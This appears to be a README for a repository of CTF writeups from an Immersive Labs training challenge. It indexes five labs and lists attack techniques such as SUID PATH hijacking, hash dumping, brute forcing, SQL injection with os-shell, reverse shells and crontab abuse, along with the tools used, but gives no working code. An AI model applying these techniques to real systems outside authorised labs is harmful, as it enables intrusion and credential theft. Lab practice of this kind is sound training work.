raven-telepak/human-connection-ctf

# Human Connection Challenge: CTF Writeup **Platform:** Immersive Labs **Challenge:** Human Connection Challenge, Season 1 **Categories:** Basic OS Skills · Scanning · Web Exploitation · Linux · Windows **Difficulty:** 6-7/10 per lab **Status:** All five labs completed ## Overview This writeup documents the exploitation chain across five practical labs covering Linux and Windows privilege escalation, network scanning and enumeration, and web application exploitation. Each lab involved gaining access to one or more target machines and recovering hidden tokens. No hints or guided walkthroughs were used during initial attempts. Where research was required, sources are noted. ## Lab Index | Lab | Key Techniques | Status | |---|---|---| | [Basic OS Skills](writeups/basic-os-skills.md) | SSH, SUID abuse, nano privilege escalation, Windows registry credential recovery | Completed | | [Scanning](writeups/scanning.md) | nslookup, nmap, Netcat, sslscan, smbclient, WinRM, Metasploit | Completed | | [Web Exploitation](writeups/web-exploitation.md) | robots.txt, dirb, Hydra, SQL injection, reflected XSS, LFI/directory traversal | Completed | | [Linux](writeups/linux.md) | Redis exploit, Hydra SSH brute force, PATH hijacking via SUID, WebDAV reverse shell, crontab abuse | Completed | | [Windows](writeups/windows.md) | SMB enumeration, SAM/SYSTEM hash dump, impacket-secretsdump, john, SQLMap, msfvenom, Unattend.xml credential recovery | Completed | ## Tools Reference | Tool | Purpose | |---|---| | nmap | Port scanning and service enumeration | | Netcat (`nc`) | Banner grabbing and raw TCP connections | | sslscan | TLS/SSL configuration analysis | | smbclient | SMB share enumeration and file access | | Hydra | Credential brute forcing (SSH, HTTP, WebDAV) | | Metasploit (`msfconsole`) | Exploit framework; Redis, WinRM, WebDAV modules | | msfvenom | Payload generation for reverse shells | | sqlmap | Automated SQL injection detection and exploitation | | dirb | Web directory brute forcing | | impacket-secretsdump | SAM/SYSTEM/SECURITY hash extraction | | john | Password hash cracking | | xfreerdp | RDP client for remote desktop access | | gcc | C compiler used for SUID PATH hijack exploit | ## Structure human-connection-ctf/ ├── README.md ← you are here └── writeups/ ├── basic-os-skills.md ← SSH, SUID, Windows registry ├── scanning.md ← nmap, smbclient, WinRM ├── web-exploitation.md ← SQLi, XSS, LFI, Hydra ├── linux.md ← Redis, PATH hijack, WebDAV, crontab └── windows.md ← SMB, hash dump, SQLMap, Unattend.xml ## Key Takeaways - SUID binaries with PATH dependencies can be abused by injecting a malicious binary earlier in `$PATH` - SAM and SYSTEM backup files exposed via SMB allow offline hash extraction without touching LSASS - SQL injection via `sqlmap --os-shell` can provide direct command execution on the underlying host - Credentials stored in `Unattend.xml` are a common misconfiguration on Windows systems built with automated setup tools - Crontab scripts writable by non-root users are a reliable privilege escalation vector when run as root - A single endpoint running WinRM with known credentials provides full remote command execution without needing RDP